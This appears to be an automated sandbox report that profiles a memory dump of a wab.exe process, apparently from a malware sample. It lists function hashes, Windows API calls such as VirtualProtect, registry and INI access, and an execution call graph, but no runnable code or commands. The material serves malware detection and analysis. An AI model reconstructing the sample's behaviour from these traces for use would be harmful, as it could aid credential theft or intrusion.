                                                                                                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408B79
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 231171946-0
                                                                                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1961120804-0
                                                                                                                                                                                          • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                                                                                          Signature Coverage:0.5%
                                                                                                                                                                                          Total number of Nodes:845
                                                                                                                                                                                          Total number of Limit Nodes:17
                                                                                                                                                                                          execution_graph 34077 43ee43 59 API calls 34079 405e41 14 API calls 33890 429046 memset memset memcpy memset memset 33891 432447 17 API calls 33892 401445 memcpy memcpy DialogBoxParamA 33893 413848 strcmp 33894 41104f 16 API calls 33896 411a2d 14 API calls 34084 424852 76 API calls 33898 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34085 432654 15 API calls 33903 40b05a LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33906 401060 41 API calls 32985 410663 EnumResourceNamesA 33908 40b865 8 API calls 33909 427867 15 API calls 34088 425e13 87 API calls 33910 404469 22 API calls 34090 41466f 16 API calls 33913 425474 16 API calls 33914 426474 memcpy memset memset memcpy 34092 42e27a 61 API calls 34095 411201 RtlDeleteCriticalSection 33917 444003 __dllonexit 34099 404207 modf 33919 410808 memset SHGetPathFromIDList SendMessageA 33920 42a80b 27 API calls 33864 444a0f 33865 444a26 33864->33865 33868 444a94 33864->33868 33865->33868 33871 444a4e 33865->33871 33867 444a45 33867->33868 33869 444a75 VirtualProtect 33867->33869 33869->33868 33870 444a84 VirtualProtect 33869->33870 33870->33868 33872 444a53 33871->33872 33876 444a94 33872->33876 33878 444a6b 33872->33878 33874 444a5c 33875 444a75 VirtualProtect 33874->33875 33874->33876 33875->33876 33877 444a84 VirtualProtect 33875->33877 33877->33876 33879 444a71 33878->33879 33880 444a75 VirtualProtect 33879->33880 33882 444a94 33879->33882 33881 444a84 VirtualProtect 33880->33881 33880->33882 33881->33882 34101 40420c 12 API calls 34105 409213 10 API calls 33923 411014 15 API calls 34106 404217 26 API calls 34107 403a18 strlen WriteFile 33924 43f41d 17 API calls 33925 43f022 19 API calls 34110 408e21 7 API calls 34111 411222 RtlEnterCriticalSection 34114 43ee2d 112 API calls 34115 411231 RtlLeaveCriticalSection 34116 403632 21 API calls 34119 413e34 19 API calls 33934 427434 76 API calls 33935 423c3b 19 API calls 33939 405cc1 65 API calls 33941 424852 75 API calls 34121 4092cb 17 API calls 34122 4442cf _exit _c_exit 33945 43ecc8 18 API calls 34123 408ed5 7 API calls 34125 405edc SetDlgItemTextA GetDlgItemTextA 33950 424852 79 API calls 33951 424852 76 API calls 34126 427645 42 API calls 33954 4338e6 15 API calls 34128 43eae9 149 API calls 33956 4100ec 42 API calls 33958 426ced memset memset memcpy 34129 40c2ef 43 API calls 34130 40def0 9 API calls 34131 403af4 54 API calls 33963 43e8f9 122 API calls 34132 4016fc NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34133 4336fd 17 API calls 34134 403e83 34 API calls 34135 42968a 11 API calls 34136 40da89 42 API calls 33965 425e13 21 API calls 33967 43ec88 119 API calls 33968 426c8e 41 API calls 34137 433a8f 18 API calls 33970 409c8d _strcmpi 34139 44128b memcmp 34144 40aa94 7 API calls 34146 424852 111 API calls 34147 43f698 21 API calls 34152 4276ad 47 API calls 34153 423ab3 18 API calls 34155 43f2b7 17 API calls 33983 43f4ba 18 API calls 34156 424852 85 API calls 34157 4442bb _XcptFilter 33988 444941 ??3@YAXPAX 33990 424852 77 API calls 34158 43ef44 20 API calls 33991 42d14a 22 API calls 34159 404348 19 API calls 33992 40b94b 138 API calls 34161 424852 76 API calls 34162 40c750 59 API calls 33995 414557 memset memset 33996 42523b 79 API calls 33998 40ad58 30 API calls 34000 44315e 44 API calls 34001 41055b WritePrivateProfileStringA GetPrivateProfileStringA 34166 413f5c 18 API calls 34168 43f361 134 API calls 34005 440162 17 API calls 34006 444963 FreeLibrary 34007 429d69 memcpy 34169 40176b ExitProcess 34171 43eb6e 17 API calls 34009 437972 110 API calls 34010 405972 40 API calls 34173 442f71 _mbscpy 34012 403577 20 API calls 34015 44497b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34018 444905 _onexit __dllonexit 34019 43ed07 20 API calls 32986 410507 32989 4103e0 32986->32989 32988 410527 32990 4103ec 32989->32990 32991 4103fe GetPrivateProfileIntA 32989->32991 32994 4102f8 memset _itoa WritePrivateProfileStringA 32990->32994 32991->32988 32993 4103f9 32993->32988 32994->32993 34175 415b07 memcpy memcpy memcpy memcpy 34176 40af07 8 API calls 34022 414d0c 22 API calls 34023 433513 19 API calls 34180 424852 83 API calls 34027 40a117 memset sprintf SendMessageA 34181 40c319 125 API calls 34182 40b31a memset memset _mbsicmp 34029 410d1d 18 API calls 34186 441727 38 API calls 34031 433126 16 API calls 34188 42732a 24 API calls 32995 44412e 33014 44431c 32995->33014 32997 44413a GetModuleHandleA 32998 44414c __set_app_type __p__fmode __p__commode 32997->32998 33000 4441de 32998->33000 33001 4441e6 __setusermatherr 33000->33001 33002 4441f2 33000->33002 33001->33002 33015 444306 _controlfp 33002->33015 33004 4441f7 _initterm __getmainargs _initterm 33005 44424e GetStartupInfoA 33004->33005 33007 444282 GetModuleHandleA 33005->33007 33016 40cc66 33007->33016 33011 4442b3 _cexit 33013 4442e8 33011->33013 33012 4442ac exit 33012->33011 33014->32997 33015->33004 33067 404a94 LoadLibraryA 33016->33067 33018 40cc82 33019 40cc86 33018->33019 33075 41067e 33018->33075 33019->33011 33019->33012 33021 40cc91 33079 40c9f7 ??2@YAPAXI 33021->33079 33023 40ccbd 33093 407a4b 33023->33093 33028 40cce6 33111 409596 memset 33028->33111 33029 40ccfa 33116 409465 memset 33029->33116 33034 40cea3 ??3@YAXPAX 33036 40cec1 DeleteObject 33034->33036 33037 40ced5 33034->33037 33035 407bbf _strcmpi 33038 40cd10 33035->33038 33036->33037 33140 4076d7 ??3@YAXPAX ??3@YAXPAX 33037->33140 33040 40cd14 RegDeleteKeyA 33038->33040 33041 40cd29 EnumResourceTypesA 33038->33041 33040->33034 33043 40cd51 MessageBoxA 33041->33043 33044 40cd69 33041->33044 33042 40cee6 33141 4045bd ??3@YAXPAX 33042->33141 33043->33034 33046 40cdc2 CoInitialize 33044->33046 33121 40cb90 33044->33121 33138 40c946 strncat memset RegisterClassA CreateWindowExA 33046->33138 33048 40ceef 33142 4076d7 ??3@YAXPAX ??3@YAXPAX 33048->33142 33050 40cdd3 ShowWindow UpdateWindow LoadAcceleratorsA 33139 40bfb1 PostMessageA 33050->33139 33054 40cdc0 33054->33046 33055 40cd83 ??3@YAXPAX 33055->33037 33057 40cda6 DeleteObject 33055->33057 33057->33037 33059 40ce1b GetMessageA 33060 40ce9d 33059->33060 33061 40ce2f 33059->33061 33060->33034 33062 40ce35 TranslateAccelerator 33061->33062 33064 40ce67 IsDialogMessage 33061->33064 33065 40ce5b IsDialogMessage 33061->33065 33062->33061 33063 40ce8f GetMessageA 33062->33063 33063->33060 33063->33062 33064->33063 33066 40ce79 TranslateMessage DispatchMessageA 33064->33066 33065->33063 33065->33064 33066->33063 33068 404abf GetProcAddress 33067->33068 33071 404ae7 33067->33071 33069 404ad8 FreeLibrary 33068->33069 33072 404acf 33068->33072 33070 404ae3 33069->33070 33069->33071 33070->33071 33073 404af7 MessageBoxA 33071->33073 33074 404b0e 33071->33074 33072->33069 33073->33018 33074->33018 33076 410687 LoadLibraryA 33075->33076 33077 4106ac 33075->33077 33076->33077 33078 41069b GetProcAddress 33076->33078 33077->33021 33078->33077 33080 40ca28 ??2@YAPAXI 33079->33080 33082 40ca46 33080->33082 33083 40ca4d 33080->33083 33150 40400d 6 API calls 33082->33150 33085 40ca86 33083->33085 33086 40ca79 DeleteObject 33083->33086 33143 406e26 33085->33143 33086->33085 33088 40ca8b 33146 4019b4 33088->33146 33091 4019b4 strncat 33092 40cadf _mbscpy 33091->33092 33092->33023 33152 4076d7 ??3@YAXPAX ??3@YAXPAX 33093->33152 33095 407a86 33098 4077ae malloc memcpy ??3@YAXPAX ??3@YAXPAX 33095->33098 33099 407b6b 33095->33099 33101 407b09 ??3@YAXPAX 33095->33101 33106 407b93 33095->33106 33156 4076fd 7 API calls 33095->33156 33157 406cce 33095->33157 33098->33095 33099->33106 33165 4077ae 33099->33165 33101->33095 33153 4077e4 33106->33153 33107 407bbf 33108 407be6 33107->33108 33109 407bc7 33107->33109 33108->33028 33108->33029 33109->33108 33110 407bd0 _strcmpi 33109->33110 33110->33108 33110->33109 33171 409570 33111->33171 33113 4095c5 33176 4094a2 33113->33176 33117 409570 3 API calls 33116->33117 33118 409494 33117->33118 33196 4093dd 33118->33196 33210 4023a9 33121->33210 33127 40cbf4 33299 40cafa 7 API calls 33127->33299 33128 40cbef 33132 40cc60 33128->33132 33251 40c12b memset GetModuleFileNameA strrchr 33128->33251 33132->33054 33132->33055 33134 40cc0e 33278 40ad59 33134->33278 33138->33050 33139->33059 33140->33042 33141->33048 33142->33019 33151 406d65 memset _mbscpy 33143->33151 33145 406e3d CreateFontIndirectA 33145->33088 33147 4019e0 33146->33147 33148 4019c1 strncat 33147->33148 33149 4019e4 memset LoadIconA 33147->33149 33148->33147 33149->33091 33150->33083 33151->33145 33152->33095 33154 4077f4 33153->33154 33155 4077ea ??3@YAXPAX 33153->33155 33154->33107 33155->33154 33156->33095 33158 406cd5 malloc 33157->33158 33159 406d1b 33157->33159 33161 406d11 33158->33161 33162 406cf6 33158->33162 33159->33095 33161->33095 33163 406d0a ??3@YAXPAX 33162->33163 33164 406cfa memcpy 33162->33164 33163->33161 33164->33163 33166 4077c7 33165->33166 33167 4077bc ??3@YAXPAX 33165->33167 33168 406cce 3 API calls 33166->33168 33169 4077d2 33167->33169 33168->33169 33170 4076fd 7 API calls 33169->33170 33170->33106 33187 406d34 GetModuleFileNameA 33171->33187 33173 409576 strrchr 33174 409585 33173->33174 33175 409588 _mbscat 33173->33175 33174->33175 33175->33113 33188 4446d0 33176->33188 33178 4094af _mbscpy _mbscpy 33190 40907d 33178->33190 33181 40907d 3 API calls 33182 4094ea EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33181->33182 33183 409536 LoadStringA 33182->33183 33184 40954c 33183->33184 33184->33183 33186 409564 33184->33186 33195 4090eb memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33184->33195 33186->33034 33187->33173 33189 4446d7 33188->33189 33189->33178 33189->33189 33191 4446d0 33190->33191 33192 40908a memset GetPrivateProfileStringA 33191->33192 33193 4090e5 33192->33193 33194 4090d5 WritePrivateProfileStringA 33192->33194 33193->33181 33194->33193 33195->33184 33206 406d1f GetFileAttributesA 33196->33206 33198 4093e6 33199 40945f 33198->33199 33200 4093eb _mbscpy _mbscpy GetPrivateProfileIntA 33198->33200 33199->33035 33207 408fe9 GetPrivateProfileStringA 33200->33207 33202 40943a 33208 408fe9 GetPrivateProfileStringA 33202->33208 33204 40944b 33209 408fe9 GetPrivateProfileStringA 33204->33209 33206->33198 33207->33202 33208->33204 33209->33199 33301 409989 33210->33301 33213 401e60 memset 33340 41072b 33213->33340 33216 401eb9 33370 406e81 strlen _mbscat _mbscpy _mbscat 33216->33370 33217 401ecb 33355 406d1f GetFileAttributesA 33217->33355 33220 401edd strlen strlen 33222 401f1f 33220->33222 33223 401f0c 33220->33223 33356 406d1f GetFileAttributesA 33222->33356 33371 406e81 strlen _mbscat _mbscpy _mbscat 33223->33371 33226 401f2c 33357 401c30 33226->33357 33230 401c30 7 API calls 33232 401f6c 33230->33232 33231 401f88 33233 401f93 memset 33231->33233 33234 40217e 33231->33234 33369 410411 RegOpenKeyExA 33232->33369 33372 4104d7 RegEnumKeyExA 33233->33372 33236 40219f _strcmpi 33234->33236 33237 40218c ExpandEnvironmentStringsA 33234->33237 33236->33127 33236->33128 33381 406d1f GetFileAttributesA 33237->33381 33239 402175 RegCloseKey 33239->33234 33240 401fd0 atoi 33241 401fe6 memset memset sprintf 33240->33241 33249 401fc0 33240->33249 33373 410493 33241->33373 33244 40215c 33244->33239 33245 40206d memset memset strlen strlen 33245->33249 33246 4020d4 strlen strlen 33246->33249 33247 406e81 strlen _mbscat _mbscpy _mbscat 33247->33249 33248 406d1f GetFileAttributesA 33248->33249 33249->33239 33249->33240 33249->33244 33249->33245 33249->33246 33249->33247 33249->33248 33250 40215e _mbscpy 33249->33250 33380 4104d7 RegEnumKeyExA 33249->33380 33250->33239 33252 40c17b 33251->33252 33253 40c17e _mbscat _mbscpy _mbscpy 33251->33253 33252->33253 33254 40c1f6 33253->33254 33255 40c26b 33254->33255 33256 40c25b GetWindowPlacement 33254->33256 33257 40c291 33255->33257 33402 4017d1 GetSystemMetrics GetSystemMetrics SetWindowPos 33255->33402 33256->33255 33395 40989e 33257->33395 33261 40b783 33262 40b7e2 33261->33262 33267 40b797 33261->33267 33405 406a00 LoadCursorA SetCursor 33262->33405 33264 40b7e7 33406 410411 RegOpenKeyExA 33264->33406 33407 40472f 33264->33407 33415 404780 33264->33415 33418 403c03 33264->33418 33494 410166 33264->33494 33265 40b79e _mbsicmp 33265->33267 33266 40b7fb 33268 407bbf _strcmpi 33266->33268 33267->33262 33267->33265 33497 40b340 10 API calls 33267->33497 33271 40b80b 33268->33271 33269 40b855 SetCursor 33269->33134 33271->33269 33272 40b84c qsort 33271->33272 33272->33269 33279 40ad6d 33278->33279 33858 409b5a SendMessageA ??2@YAPAXI ??3@YAXPAX 33278->33858 33281 40ad75 33279->33281 33282 40ad7e GetStdHandle 33279->33282 33857 406ab8 CreateFileA 33281->33857 33284 40ad7b 33282->33284 33285 40ad94 33284->33285 33286 40ae8c 33284->33286 33859 406a00 LoadCursorA SetCursor 33285->33859 33863 406b15 9 API calls 33286->33863 33289 40ae95 33300 40c2d6 28 API calls 33289->33300 33290 40ada1 33291 40ade6 33290->33291 33297 40ae00 33290->33297 33860 40a2db strlen WriteFile 33290->33860 33291->33297 33861 40a3f8 12 API calls 